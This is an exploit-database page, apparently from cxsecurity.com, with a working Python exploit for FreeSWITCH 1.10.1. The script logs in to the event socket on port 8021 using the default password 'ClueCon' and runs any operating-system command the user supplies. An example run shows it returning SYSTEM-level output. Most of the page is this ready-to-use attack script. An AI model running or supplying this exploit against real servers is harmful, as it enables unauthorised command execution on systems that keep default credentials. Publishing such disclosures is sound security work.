FreeSWITCH 1.10.1 Command Execution

2019.12.25
Credit: 1F98D
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-78

# Exploit Title: FreeSWITCH 1.10.1 - Command Execution # Date: 2019-12-19 # Exploit Author: 1F98D # Vendor Homepage: https://freeswitch.com/ # Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi # Version: 1.10.1 # Tested on: Windows 10 (x64) # # FreeSWITCH listens on port 8021 by default and will accept and run commands sent to # it after authenticating. By default commands are not accepted from remote hosts. # # -- Example -- # root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami # Authenticated # Content-Type: api/response # Content-Length: 20 # # nt authority\system # #!/usr/bin/python3 from socket import * import sys if len(sys.argv) != 3: print('Missing arguments') print('Usage: freeswitch-exploit.py <target> <cmd>') sys.exit(1) ADDRESS=sys.argv[1] CMD=sys.argv[2] PASSWORD='ClueCon' # default password for FreeSWITCH s=socket(AF_INET, SOCK_STREAM) s.connect((ADDRESS, 8021)) response = s.recv(1024) if b'auth/request' in response: s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8')) response = s.recv(1024) if b'+OK accepted' in response: print('Authenticated') s.send(bytes('api system {}\n\n'.format(CMD), 'utf8')) response = s.recv(8096).decode() print(response) else: print('Authentication failed') sys.exit(1) else: print('Not prompted for authentication, likely not vulnerable') sys.exit(1)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top